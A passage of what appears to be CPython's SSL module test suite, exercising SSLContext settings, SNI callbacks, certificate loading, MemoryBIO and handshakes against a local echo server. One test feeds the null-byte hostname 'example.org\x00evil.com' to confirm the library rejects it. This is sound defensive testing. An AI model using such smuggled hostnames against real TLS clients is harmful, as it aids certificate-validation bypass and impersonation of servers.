ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(), server_side=True)
self.assertIsInstance(obj, MySSLObject)
def test_num_tickest(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_get_server_certificate_timeout(self):
def servername_cb(ssl_sock, server_name, initial_context):
time.sleep(0.2)
self.server_context.set_servername_callback(servername_cb)
with self.assertRaises(socket.timeout):
ssl.get_server_certificate(self.server_addr, ca_certs=SIGNING_CA,
timeout=0.1)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
